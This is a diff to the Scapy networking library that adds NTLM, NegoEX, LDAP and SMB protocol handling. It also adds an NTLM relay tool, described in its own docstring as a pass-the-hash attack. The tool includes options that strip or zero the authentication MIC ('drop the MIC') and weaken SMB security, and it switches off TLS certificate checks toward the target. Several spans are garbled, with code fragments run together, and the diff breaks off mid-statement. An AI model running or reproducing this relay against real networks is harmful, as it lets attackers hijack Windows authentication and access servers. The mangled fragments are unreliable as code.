LEIntEnumField("MessageType", 0, {0x0: "INITIATOR_NEGO", + 0x01: "ACCEPTOR_NEGO", + 0x02: "INITIATOR_META_DATA", + 0x03: "ACCEPTOR_META_DATA", + 0x04: "CHALENGE", + 0x05: "AP_REQUEST", + 0x06: "VERIFY", + 0x07: "ALERT"}), + LEIntField("SequenceNum", 0), + LEIntField("cbHeaderLength", None), + LEIntField("cbMessageLength", None), + UUIDField("ConversationId", None), + ] + + def post_build(self, pkt, pay): + if self.cbHeaderLength is None: + pkt = pkt[16:] + struct.pack(" bytes + """Util function to build the offset and populate the lengths""" + for field_name, value in self.fields["Payload"]: + length = self.get_field( + "Payload").fields_map[field_name].i2len(self, value) + count = self.get_field( + "Payload").fields_map[field_name].i2count(self, value) + offset = fields[field_name] + # Offset + if self.getfieldval(field_name + "BufferOffset") is None: + p = p[:offset] + \ + struct.pack(" bytes + return _NEGOEX_post_build(self, pkt, self.OFFSET, { + "AuthScheme": 96, + "Extension": 102, + }) + pay + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 12: + MessageType = struct.unpack(" None + def send_reply(self, reply, send_function=None): + # type: (Packet, Any) -> None if 'iface' in self.optsend: self.send_function(reply, **self.optsend) else: diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 8d7be10d198..42326778462 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -10,6 +10,7 @@ RFC 4511 - LDAP v3 """ +from scapy.automaton import Automaton, ATMT from scapy.asn1.asn1 import ASN1_STRING, ASN1_Class_UNIVERSAL, ASN1_Codecs from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1fields import ( @@ -29,6 +30,7 @@ from scapy.packet import bind_bottom_up, bind_layers from scapy.layers.inet import TCP, UDP +from scapy.layers.ntlm import NTLM_Client # Elements of protocol # https://datatracker.ietf.org/doc/html/rfc1777#section-4 @@ -444,3 +446,88 @@ class CLDAP(ASN1_Packet): bind_bottom_up(UDP, CLDAP, dport=389) bind_bottom_up(UDP, CLDAP, sport=389) bind_layers(UDP, CLDAP, sport=389, dport=389) + + +# NTLM Automata + + +class NTLM_LDAP_Client(NTLM_Client, Automaton): + port = 389 + cls = LDAP + + def __init__(self, *args, **kwargs): + self.messageID = 1 + self.authenticated = False + super(NTLM_LDAP_Client, self).__init__(*args, **kwargs) + + @ATMT.state(initial=1) + def BEGIN(self): + self.wait_server() + + @ATMT.condition(BEGIN) + def begin(self): + raise self.WAIT_FOR_TOKEN() + + @ATMT.state() + def WAIT_FOR_TOKEN(self): + pass + + @ATMT.condition(WAIT_FOR_TOKEN) + def should_send_bind(self): + ntlm_tuple = self.get_token() + raise self.SENT_BIND().action_parameters(ntlm_tuple) + + @ATMT.action(should_send_bind) + def send_bind(self, ntlm_tuple): + ntlm_token, _, _ = ntlm_tuple + pkt = LDAP( + messageID=self.messageID, + protocolOp=LDAP_BindRequest( + version=2, + authentication=LDAP_SaslCredentials( + mechanism="GSS-SPNEGO", + credentials=ntlm_token + ) + ) + ) + self.send(pkt) + self.messageID += 1 + + @ATMT.state() + def SENT_BIND(self): + pass + + @ATMT.receive_condition(SENT_BIND) + def receive_bind_response(self, pkt): + if isinstance(pkt.protocolOp, LDAP_BindResponse): + if pkt.protocolOp.resultCode == 0x31: # Invalid credentials + ntlm_tuple = (None, None, None) + elif pkt.protocolOp.resultCode == 0x0: # Auth success + ntlm_tuple = (None, 0, None) + self.authenticated = True + elif pkt.protocolOp.resultCode == 0x35: # UnwillingToPerform + print("Error:") + pkt.show() + raise self.ERRORED() + else: + ntlm_tuple = self._get_token( + pkt.protocolOp.serverSaslCreds.val + ) + self.received_ntlm_token(ntlm_tuple) + if self.authenticated: + raise self.AUTHENTICATED() + else: + raise self.WAIT_FOR_TOKEN() + + @ATMT.state(final=1) + def ERRORED(self): + pass + + @ATMT.state(final=1) + def AUTHENTICATED(self): + pass + + +class NTLM_LDAPS_Client(NTLM_LDAP_Client): + port = 636 + ssl = True diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 4d33cf8585b..9edafcf4e3e 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -9,13 +9,28 @@ https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf """ +import ssl +import socket import struct +import threading + +from scapy.arch import get_if_addr +from scapy.asn1.asn1 import ASN1_STRING, ASN1_Codecs +from scapy.asn1.mib import conf # loads conf.mib +from scapy.asn1fields import ( + ASN1F_OID, + ASN1F_PRINTABLE_STRING, + ASN1F_SEQUENCE, + ASN1F_SEQUENCE_OF +) +from scapy.asn1packet import ASN1_Packet +from scapy.automaton import Automaton, ObjectPipe from scapy.compat import bytes_base64 -from scapy.config import conf from scapy.fields import ( Field, ByteEnumField, ByteField, + ConditionalField, FieldLenField, FlagsField, LEIntField, @@ -38,9 +53,11 @@ ) from scapy.packet import Packet from scapy.sessions import StringBuffer +from scapy.supersocket import SSLStreamSocket, StreamSocket from scapy.compat import ( Any, + Callable, Dict, List, Tuple, @@ -55,17 +72,24 @@ class _NTLMPayloadField(_StrField[List[Tuple[str, Any]]]): """Special field used to dissect NTLM payloads. This isn't trivial because the offsets are variable.""" - __slots__ = ["fields", "fields_map", "offset"] + __slots__ = ["fields", "fields_map", "offset", "length_from"] islist = True - def __init__(self, name, offset, fields): - # type: (str, int, List[Field[Any, Any]]) -> None + def __init__(self, + name, # type: str + offset, # type: int + fields, # type: List[Field[Any, Any]] + length_from=None # type: Optional[Callable[[Packet], int]] + ): + # type: (...) -> None self.offset = offset self.fields = fields self.fields_map = {field.name: field for field in fields} + self.length_from = length_from super(_NTLMPayloadField, self).__init__( name, - [(field.name, field.default) for field in fields] + [(field.name, field.default) for field in fields + if field.default is not None] ) def m2i(self, pkt, x): @@ -74,8 +98,11 @@ def m2i(self, pkt, x): return [] results = [] for field in self.fields: - length = pkt.getfieldval(field.name + "Len") offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset + try: + length = pkt.getfieldval(field.name + "Len") + except AttributeError: + length = len(x) - offset if offset < 0: continue if x[offset:offset + length]: @@ -91,43 +118,70 @@ def i2m(self, pkt, x): if field_name not in self.fields_map: continue field = self.fields_map[field_name] - offset = (-self.offset + pkt.getfieldval( - field_name + "BufferOffset")) or len(buf) + offset = pkt.getfieldval(field_name + "BufferOffset") + if offset is not None: + offset -= self.offset + else: + offset = len(buf) buf.append(field.addfield(pkt, b"", value), offset + 1) return bytes(buf) - def i2h(self, pkt, x): - # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] + def _on_payload(self, pkt, x, func): + # type: (Optional[Packet], bytes, str) -> List[Tuple[str, Any]] if not pkt or not x: return [] results = [] for field_name, value in x: if field_name not in self.fields_map: continue - results.append( - (field_name, self.fields_map[field_name].i2h(pkt, value))) + if not isinstance(self.fields_map[field_name], PacketListField) \ + and not isinstance(value, Packet): + value = getattr(self.fields_map[field_name], func)(pkt, value) + results.append(( + field_name, + value + )) return results + def i2h(self, pkt, x): + # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] + return self._on_payload(pkt, x, "i2h") -def _NTML_post_build(self, p, pay_offset, fields): + def h2i(self, pkt, x): + # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] + return self._on_payload(pkt, x, "h2i") + + def i2repr(self, pkt, x): + # type: (Optional[Packet], bytes) -> str + return repr(self._on_payload(pkt, x, "i2repr")) + + def getfield(self, pkt, s): + # type: (Packet, bytes) -> Tuple[bytes, bytes] + if self.length_from is None: + return b"", self.m2i(pkt, s) + len_pkt = self.length_from(pkt) + return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) + + +def _NTLM_post_build(self, p, pay_offset, fields): # type: (Packet, bytes, int, Dict[str, Tuple[str, int]]) -> bytes """Util function to build the offset and populate the lengths""" - for field_name, value in self.Payload: + for field_name, value in self.fields["Payload"]: length = self.get_field( "Payload").fields_map[field_name].i2len(self, value) offset = fields[field_name] # Length if self.getfieldval(field_name + "Len") is None: p = p[:offset] + \ - struct.pack("!H", length) + p[offset + 2:] + struct.pack(" bytes - return _NTML_post_build(self, pkt, self.OFFSET, { + return _NTLM_post_build(self, pkt, self.OFFSET, { "DomainName": 16, "WorkstationName": 24, }) + pay @@ -311,7 +365,7 @@ def default_payload_class(self, payload): class NTLM_CHALLENGE(Packet): - name = "NTLM Negotiate" + name = "NTLM Challenge" messageType = 2 OFFSET = 56 fields_desc = [ @@ -340,7 +394,7 @@ class NTLM_CHALLENGE(Packet): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _NTML_post_build(self, pkt, self.OFFSET, { + return _NTLM_post_build(self, pkt, self.OFFSET, { "TargetName": 12, "TargetInfo": 40, }) + pay @@ -424,7 +478,10 @@ class NTLM_AUTHENTICATE(Packet): # VERSION _NTLM_Version, # MIC - XStrFixedLenField('MIC', b"", length=16), + ConditionalField( + XStrFixedLenField('MIC', b"", length=16), + lambda pkt: pkt.fields.get('MIC', b"") is not None + ), # Payload _NTLMPayloadField( 'Payload', OFFSET, [ @@ -449,7 +506,7 @@ class NTLM_AUTHENTICATE(Packet): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - return _NTML_post_build(self, pkt, self.OFFSET, { + return _NTLM_post_build(self, pkt, self.OFFSET, { "LmChallengeResponse": 12, "NtChallengeResponse": 20, "DomainName": 28, @@ -470,3 +527,287 @@ def HTTP_ntlm_negotiate(ntlm_negotiate): return HTTP() / HTTPRequest( Authorization=b"NTLM " + bytes_base64(bytes(ntlm_negotiate)) ) + +# Answering machine + + +class _NTLM_Automaton(Automaton): + def __init__(self, sock, **kwargs): + # type: (StreamSocket, Any) -> None + self.token_pipe = ObjectPipe() + self.values = {} + for key, dflt in [("DROP_MIC_v1", False), ("DROP_MIC_v2", False)]: + setattr(self, key, kwargs.pop(key, dflt)) + self.DROP_MIC = self.DROP_MIC_v1 or self.DROP_MIC_v2 + super(_NTLM_Automaton, self).__init__( + recvsock=lambda **kwargs: sock, + ll=lambda **kwargs: sock, + **kwargs + ) + + def _get_token(self, token): + from scapy.layers.gssapi import ( + GSSAPI_BLOB, + SPNEGO_negToken, + SPNEGO_Token + ) + + negResult = None + MIC = None + if not token: + return None, negResult, MIC + + if isinstance(token, bytes): + ntlm = NTLM_Header(token) + elif isinstance(token, conf.raw_layer): + ntlm = NTLM_Header(token.load) + else: + if isinstance(token, GSSAPI_BLOB): + token = token.innerContextToken + if isinstance(token, SPNEGO_negToken): + token = token.token + if hasattr(token, "mechListMIC") and token.mechListMIC: + MIC = token.mechListMIC.value + if hasattr(token, "negResult"): + negResult = token.negResult + try: + ntlm = token.mechToken + except AttributeError: + ntlm = token.responseToken + if isinstance(ntlm, SPNEGO_Token): + ntlm = ntlm.value + if isinstance(ntlm, ASN1_STRING): + ntlm = NTLM_Header(ntlm.val) + if isinstance(ntlm, conf.raw_layer): + ntlm = NTLM_Header(ntlm.load) + if self.DROP_MIC_v1 or self.DROP_MIC_v2: + if isinstance(ntlm, NTLM_AUTHENTICATE): + ntlm.MIC = b"\0" * 16 + ntlm.NtChallengeResponseLen = None + ntlm.NtChallengeResponseMaxLen = None + ntlm.EncryptedRandomSessionKeyBufferOffset = None + if self.DROP_MIC_v2: + ChallengeResponse = next( + v[1] for v in ntlm.Payload + if v[0] == 'NtChallengeResponse' + ) + i = next( + i for i, k in enumerate(ChallengeResponse.AvPairs) + if k.AvId == 0x0006 + ) + ChallengeResponse.AvPairs.insert( + i + 1, + AV_PAIR(AvId="MsvAvFlags", Value=0) + ) + return ntlm, negResult, MIC + + def received_ntlm_token(self, ntlm): + self.token_pipe.send(ntlm) + + def get(self, attr, default=None): + if default is not None: + return self.values.get(attr, default) + return self.values[attr] + + def end(self): + self.listen_sock.close() + self.stop() + + +class NTLM_Client(_NTLM_Automaton): + """ + A class to overload to create a client automaton when using the + NTLM relay. + """ + port = 445 + cls = conf.raw_layer + ssl = False + kwargs_cls = {} + + def __init__(self, *args, **kwargs): + self.client_pipe = ObjectPipe() + super(NTLM_Client, self).__init__(*args, **kwargs) + + def bind(self, srv_atmt): + # type: (NTLM_Server) -> None + self.srv_atmt = srv_atmt + + def set_srv(self, attr, value): + self.srv_atmt.values[attr] = value + + def get_token(self): + return self.srv_atmt.token_pipe.recv() + + def echo(self, pkt): + return self.srv_atmt.send(pkt) + + def wait_server(self): + kwargs = self.client_pipe.recv() + self.client_pipe.close() + return kwargs + + +class NTLM_Server(_NTLM_Automaton): + """ + A class to overload to create a server automaton when using the + NTLM relay. + """ + port = 445 + cls = conf.raw_layer + + def bind(self, cli_atmt): + # type: (NTLM_Client) -> None + self.cli_atmt = cli_atmt + + def get_token(self): + return self.cli_atmt.token_pipe.recv() + + def set_cli(self, attr, value): + self.cli_atmt.values[attr] = value + + def echo(self, pkt): + return self.cli_atmt.send(pkt) + + def start_client(self, **kwargs): + self.cli_atmt.client_pipe.send(kwargs) + + +def ntlm_relay(serverCls, + remoteIP, + remoteClientCls, + # Classic attacks + DROP_MIC_v1=False, + DROP_MIC_v2=False, + DROP_EXTENDED_SECURITY=False, # SMB1 + # Optional arguments + ALLOW_SMB2=None, + server_kwargs=None, + client_kwargs=None, + iface=None): + """ + NTLM Relay + + This class aims at implementing a simple pass-the-hash attack across + various protocols. + + Usage example: + ntlm_relay(port=445, + remoteIP="192.168.122.65", + remotePort=445, + iface="eth0") + + :param port: the port to open the relay on + :param remoteIP: the address IP of the server to connect to for auth + :param remotePort: the proto to connect to the server into + """ + + assert issubclass( + serverCls, NTLM_Server), "Specify a correct NTLM server class" + assert issubclass( + remoteClientCls, NTLM_Client), "Specify a correct NTLM client class" + assert remoteIP, "Specify a valid remote IP address" + + ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ssock.bind( + (get_if_addr(iface or conf.iface), serverCls.port)) + ssock.listen(5) + sniffers = [] + server_kwargs = server_kwargs or {} + client_kwargs = client_kwargs or {} + if DROP_MIC_v1: + server_kwargs["DROP_MIC_v1"] = client_kwargs["DROP_MIC_v1"] = True + if DROP_MIC_v2: + server_kwargs["DROP_MIC_v2"] = client_kwargs["DROP_MIC_v2"] = True + if DROP_EXTENDED_SECURITY: + client_kwargs["EXTENDED_SECURITY"] = False + server_kwargs["EXTENDED_SECURITY"] = False + if ALLOW_SMB2 is not None: + client_kwargs["ALLOW_SMB2"] = server_kwargs["ALLOW_SMB2"] = ALLOW_SMB2 + for k, v in remoteClientCls.kwargs_cls.get(serverCls, {}).items(): + if k not in server_kwargs: + server_kwargs[k] = v + try: + evt = threading.Event() + while not evt.is_set(): + clientsocket, address = ssock.accept() + sock = StreamSocket(clientsocket, serverCls.cls) + srv_atmt = serverCls(sock, debug=4, **server_kwargs) + # Connect to real server + _sock = socket.socket() + _sock.connect( + (remoteIP, remoteClientCls.port) + ) + remote_sock = None + # SSL? + if remoteClientCls.ssl: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + # Disable all SSL checks... + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + _sock = context.wrap_socket(_sock) + remote_sock = SSLStreamSocket(_sock, remoteClientCls.cls) + else: + remote_sock = StreamSocket(_sock, remoteClientCls.cls) + print("%s connected -> %s" % + (repr(address), repr(_sock.getsockname()))) + cli_atmt = remoteClientCls(remote_sock, debug=4, **client_kwargs) + sock_tup = ((srv_atmt, cli_atmt), (sock, remote_sock)) + sniffers.append(sock_tup) + # Bind NTLM functions + srv_atmt.bind(cli_atmt) + cli_atmt.bind(srv_atmt) + # Start automatons + srv_atmt.runbg() + cli_atmt.runbg() + except KeyboardInterrupt: + print("Exiting.") + finally: + for atmts, socks in sniffers: + for atmt in atmts: + try: + atmt.forcestop(wait=False) + except Exception: + pass + for sock in socks: + try: + sock.close() + except Exception: + pass + ssock.close() + + +# Experimental - Reversed stuff + +# This is the GSSAPI NegoEX Exchange metadata blob. This is not documented +# but described as an "opaque blob": this was reversed and everything is a +# placeholder. + +class NEGOEX_EXCHANGE_NTLM_ITEM(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_OID("oid", ""), + ASN1F_PRINTABLE_STRING("token", ""), + explicit_tag=0x31 + ), + explicit_tag=0x80 + ) + ) + + +class NEGOEX_EXCHANGE_NTLM(ASN1_Packet): + """ + GSSAPI NegoEX Exchange metadata blob + This was reversed and may be meaningless + """ + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_SEQUENCE_OF( + "items", [], + NEGOEX_EXCHANGE_NTLM_ITEM + ), + implicit_tag=0xa0 + ), + ) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 6f08fb5344c..fd708aa8ea7 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -9,36 +9,70 @@ Specs: - [MS-CIFS] (base) - [MS-SMB] (extension of CIFS - SMB v1) + +Implements: +- CIFS/SMB +- NTLM SMB Relay """ import struct +import time +from scapy.automaton import ATMT, Automaton from scapy.config import conf -from scapy.packet import Packet, bind_layers, bind_top_down +from scapy.layers.ntlm import ( + NTLM_AUTHENTICATE, + NTLM_AUTHENTICATE_V2, + NTLM_CHALLENGE, + NTLM_NEGOTIATE, + NTLM_Client, + NTLM_Server, +) +from scapy.packet import Packet, Raw, bind_layers, bind_top_down from scapy.fields import ( ByteEnumField, ByteField, + FieldLenField, FlagsField, LEFieldLenField, LEIntField, - LELongField, LEShortField, MultipleTypeField, PacketLenField, PacketListField, ReversePadField, + ScalingField, ShortField, StrFixedLenField, - StrLenField, StrNullField, StrNullFieldUtf16, UTCTimeField, UUIDField, XStrLenField, ) +from scapy.volatile import RandUUID + from scapy.layers.netbios import NBTSession -from scapy.layers.gssapi import GSSAPI_BLOB -from scapy.layers.smb2 import SMB2_Header +from scapy.layers.gssapi import ( + GSSAPI_BLOB, + SPNEGO_MechListMIC, + SPNEGO_MechType, + SPNEGO_Token, + SPNEGO_negToken, + SPNEGO_negTokenInit, + SPNEGO_negTokenResp, +) +from scapy.layers.smb2 import ( + SMB2_Header, + SMB2_Negotiate_Protocol_Request, + SMB2_Negotiate_Protocol_Response, + SMB2_Session_Setup_Request, + SMB2_Session_Setup_Response, + SMB2_IOCTL_Request, + SMB2_Error_Response, + SMB2_Tree_Connect_Request, +) + SMB_COM = { 0x00: "SMB_COM_CREATE_DIRECTORY", @@ -151,15 +185,18 @@ class SMB_Header(Packet): "NT_STATUS", "UNICODE"]), LEShortField("PIDHigh", 0x0000), - LELongField("SecurityFeatures", 0x0), + StrFixedLenField("SecuritySignature", b"", length=8), LEShortField("Reserved", 0x0), LEShortField("TID", 0), - LEShortField("PID", 1), + LEShortField("PIDLow", 1), LEShortField("UID", 0), - LEShortField("MID", 2)] + LEShortField("MID", 0)] def guess_payload_class(self, payload): # type: (bytes) -> Packet + if not payload: + return super(SMB_Header, self).guess_payload_class(payload) + WordCount = ord(payload[:1]) if self.Command == 0x72: if self.Flags.REPLY: if self.Flags2.EXTENDED_SECURITY: @@ -169,12 +206,22 @@ def guess_payload_class(self, payload): else: return SMBNegotiate_Request elif self.Command == 0x73: + if WordCount == 0: + return SMBSession_Null if self.Flags.REPLY: + if WordCount == 0x04: + return SMBSession_Setup_AndX_Response_Extended_Security + elif WordCount == 0x03: + return SMBSession_Setup_AndX_Response if self.Flags2.EXTENDED_SECURITY: return SMBSession_Setup_AndX_Response_Extended_Security else: return SMBSession_Setup_AndX_Response else: + if WordCount == 0x0C: + return SMBSession_Setup_AndX_Request_Extended_Security + elif WordCount == 0x0D: + return SMBSession_Setup_AndX_Request if self.Flags2.EXTENDED_SECURITY: return SMBSession_Setup_AndX_Request_Extended_Security else: @@ -183,6 +230,10 @@ def guess_payload_class(self, payload): return SMBNetlogon_Protocol_Response_Header return super(SMB_Header, self).guess_payload_class(payload) + def answers(self, pkt): + return SMB_Header in pkt + + # SMB Negotiate Request @@ -198,8 +249,7 @@ def default_payload_class(self, payload): class SMBNegotiate_Request(Packet): name = "SMB Negotiate Request" fields_desc = [ByteField("WordCount", 0), - LEFieldLenField("ByteCount", None, length_of="Dialects", - adjust=lambda pkt, x: x + 1), + LEFieldLenField("ByteCount", None, length_of="Dialects"), PacketListField( "Dialects", [SMB_Dialect()], SMB_Dialect, length_from=lambda pkt: pkt.ByteCount) @@ -211,6 +261,32 @@ class SMBNegotiate_Request(Packet): # SMBNegociate Protocol Response +def _SMBStrNullField(name, default): + """ + Returns a StrNullField that is either normal or UTF-16 depending + on the SMB headers. + """ + def _isUTF16(pkt): + while not hasattr(pkt, "Flags2") and pkt.underlayer: + pkt = pkt.underlayer + return hasattr(pkt, "Flags2") and pkt.Flags2.UNICODE + return MultipleTypeField( + [ + (StrNullFieldUtf16(name, default), + _isUTF16) + ], + StrNullField(name, default), + ) + + +def _len(pkt, name): + """ + Returns the length of a field, works with Unicode strings. + """ + fld, v = pkt.getfield_and_val(name) + return len(fld.addfield(pkt, v, b"")) + + class _SMBNegotiate_Response(Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): @@ -273,7 +349,7 @@ class SMBNegotiate_Response_NoSecurity(_SMBNegotiate_Response): "SECURITY_SIGNATURES_REQUIRED"]), LEShortField("MaxMpxCount", 50), LEShortField("MaxNumberVC", 1), - LEIntField("MaxBufferSize", 16144), + LEIntField("MaxBufferSize", 16144), # Windows: 4356 LEIntField("MaxRawSize", 65536), LEIntField("SessionKey", 0x0000), FlagsField("ServerCapabilities", 0xf3f9, -32, @@ -281,13 +357,16 @@ class SMBNegotiate_Response_NoSecurity(_SMBNegotiate_Response): UTCTimeField("ServerTime", None, fmt="= 0x300: # SMB3 + raise ValueError( + "SMB client requires SMB3 which is unimplemented.") + else: + DialectIndexes = [ + x.DialectString for x in pkt[SMBNegotiate_Request].Dialects + ] + if self.ALLOW_SMB2: + # Find a value matching SMB2, fallback to SMB1 + for key, rev in [(b"SMB 2.???", 0x02ff), + (b"SMB 2.002", 0x0202)]: + try: + DialectIndex = DialectIndexes.index(key) + DialectRevision = rev + self.SMB2 = True + break + except ValueError: + pass + else: + DialectIndex = DialectIndexes.index(b"NT LM 0.12") + else: + # Enforce SMB1 + DialectIndex = DialectIndexes.index(b"NT LM 0.12") + cls = None + if self.SMB2: + # SMB2 + cls = SMB2_Negotiate_Protocol_Response + self.smb_header = NBTSession() / SMB2_Header( + CreditsRequested=1, + ) + if SMB2_Negotiate_Protocol_Request in pkt: + self.smb_header.MessageId = pkt.MessageId + self.smb_header.AsyncId = pkt.AsyncId + self.smb_header.SessionId = pkt.SessionId + else: + # SMB1 + self.smb_header = NBTSession() / SMB_Header( + Flags="REPLY+CASE_INSENSITIVE+CANONICALIZED_PATHS", + Flags2=( + "LONG_NAMES+EAS+NT_STATUS+SMB_SECURITY_SIGNATURE+" + "UNICODE+EXTENDED_SECURITY" + ), + TID=pkt.TID, + MID=pkt.MID, + UID=pkt.UID, + PIDLow=pkt.PIDLow + ) + if self.EXTENDED_SECURITY: + cls = SMBNegotiate_Response_Extended_Security + else: + cls = SMBNegotiate_Response_Security + if self.SMB2: + # SMB2 + resp = self.smb_header.copy() / cls( + DialectRevision=DialectRevision, + Capabilities="DFS", + SecurityMode=0, # self.get("SecurityMode", 1), + ServerTime=self.get("ServerTime", time.time() + 11644473600), + ServerStartTime=0, + MaxTransactionSize=65536, + MaxReadSize=65536, + MaxWriteSize=65536, + ) + else: + # SMB1 + resp = self.smb_header.copy() / cls( + DialectIndex=DialectIndex, + ServerCapabilities=( + "UNICODE+LARGE_FILES+NT_SMBS+RPC_REMOTE_APIS+STATUS32+" + "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" + "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" + ), + SecurityMode=self.get("SecurityMode"), + ServerTime=self.get("ServerTime"), + ServerTimeZone=self.get("ServerTimeZone") + ) + if self.EXTENDED_SECURITY: + resp.ServerCapabilities += "EXTENDED_SECURITY" + if self.EXTENDED_SECURITY or self.SMB2: + # Extended SMB1 / SMB2 + # Add security blob + resp.SecurityBlob = GSSAPI_BLOB( + innerContextToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit( + mechTypes=[ + # NEGOEX - Optional. See below + # NTLMSSP + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], + + ) + ) + ) + resp.GUID = self.get("GUID", RandUUID()) + if self.PASS_NEGOEX: # NEGOEX handling + # NOTE: NegoEX has an effect on how the SecurityContext is + # initialized, as detailed in [MS-AUTHSOD] sect 3.3.2 + # But the format that the Exchange token uses appears not to + # be documented :/ + resp.SecurityBlob.innerContextToken.token.mechTypes.insert( + 0, + # NEGOEX + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.30"), + ) + resp.SecurityBlob.innerContextToken.token.mechToken = SPNEGO_Token( # noqa: E501 + value=negoex_token + ) + else: + # Non-extended SMB1 + resp.Challenge = self.get("Challenge") + resp.DomainName = self.get("DomainName") + resp.ServerName = self.get("ServerName") + resp.Flags2 -= "EXTENDED_SECURITY" + if not self.SMB2: + resp[SMB_Header].Flags2 = resp[SMB_Header].Flags2 - \ + "SMB_SECURITY_SIGNATURE" + \ + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + self.send(resp) + + @ATMT.state() + def NEGOTIATED(self): + pass + + @ATMT.receive_condition(NEGOTIATED) + def received_negotiate_smb2(self, pkt): + if SMB2_Negotiate_Protocol_Request in pkt: + raise self.NEGOTIATED().action_parameters(pkt) + + @ATMT.action(received_negotiate_smb2) + def on_negotiate_smb2(self, pkt): + self.on_negotiate(pkt) + + @ATMT.receive_condition(NEGOTIATED) + def receive_setup_andx_request(self, pkt): + if SMBSession_Setup_AndX_Request_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Request in pkt: + # SMB1 + if SMBSession_Setup_AndX_Request_Extended_Security in pkt: + # Extended + ntlm_tuple = self._get_token( + pkt.SecurityBlob + ) + else: + # Non-extended + self.set_cli("AccountName", pkt.getfieldval("AccountName")) + self.set_cli("PrimaryDomain", + pkt.getfieldval("PrimaryDomain")) + self.set_cli("Path", pkt.getfieldval("Path")) + self.set_cli("Service", pkt.getfieldval("Service")) + ntlm_tuple = self._get_token( + pkt[SMBSession_Setup_AndX_Request].UnicodePassword + ) + self.set_cli("VCNumber", pkt.VCNumber) + self.set_cli("SecuritySignature", pkt.SecuritySignature) + self.set_cli("UID", pkt.UID) + self.set_cli("MID", pkt.MID) + self.set_cli("TID", pkt.TID) + self.received_ntlm_token(ntlm_tuple) + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + elif SMB2_Session_Setup_Request in pkt: + # SMB2 + ntlm_tuple = self._get_token(pkt.SecurityBlob) + self.set_cli("SecuritySignature", pkt.SecuritySignature) + self.set_cli("MessageId", pkt.MessageId) + self.set_cli("AsyncId", pkt.AsyncId) + self.set_cli("SessionId", pkt.SessionId) + self.set_cli("SecurityMode", pkt.SecurityMode) + self.received_ntlm_token(ntlm_tuple) + raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) + + @ATMT.state() + def RECEIVED_SETUP_ANDX_REQUEST(self): + pass + + @ATMT.action(receive_setup_andx_request) + def on_setup_andx_request(self, pkt): + ntlm_token, negResult, MIC = ntlm_tuple = self.get_token() + if SMBSession_Setup_AndX_Request_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Request in pkt or\ + SMB2_Session_Setup_Request in pkt: + if SMB2_Session_Setup_Request in pkt: + # SMB2 + self.smb_header.MessageId = self.get( + "MessageId", self.smb_header.MessageId + 1) + self.smb_header.AsyncId = self.get( + "AsyncId", self.smb_header.AsyncId) + self.smb_header.SessionId = self.get( + "SessionId", self.smb_header.SessionId) + else: + # SMB1 + self.smb_header.UID = self.get("UID") + self.smb_header.MID = self.get("MID") + self.smb_header.TID = self.get("TID") + if ntlm_tuple == (None, None, None): + # Error + if SMB2_Session_Setup_Request in pkt: + # SMB2 + resp = self.smb_header.copy() / \ + SMB2_Session_Setup_Response() + else: + # SMB1 + resp = self.smb_header.copy() / SMBSession_Null() + resp.Status = self.get("Status", 0xc000006d) + else: + # Negotiation + if SMBSession_Setup_AndX_Request_Extended_Security in pkt or\ + SMB2_Session_Setup_Request in pkt: + # SMB1 extended / SMB2 + if SMB2_Session_Setup_Request in pkt: + # SMB2 + resp = self.smb_header.copy() / \ + SMB2_Session_Setup_Response() + else: + # SMB1 extended + resp = self.smb_header.copy() / \ + SMBSession_Setup_AndX_Response_Extended_Security( + NativeOS=self.get("NativeOS"), + NativeLanMan=self.get("NativeLanMan") + ) + if isinstance(ntlm_token, NTLM_CHALLENGE): + resp.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=1, + supportedMech=SPNEGO_MechType( + # NTLMSSP + oid="1.3.6.1.4.1.311.2.2.10"), + responseToken=SPNEGO_Token( + value=ntlm_token + ) + ) + ) + elif not ntlm_token: + # No token (e.g. accepted) + resp.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=negResult, + ) + ) + if MIC and not self.DROP_MIC: # Drop the MIC? + resp.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( # noqa: E501 + value=MIC + ) + if negResult == 0: + self.authenticated = True + else: + resp.SecurityBlob = ntlm_token + elif SMBSession_Setup_AndX_Request in pkt: + # Non-extended + resp = self.smb_header.copy() / \ + SMBSession_Setup_AndX_Response( + NativeOS=self.get("NativeOS"), + NativeLanMan=self.get("NativeLanMan") + ) + resp.Status = self.get( + 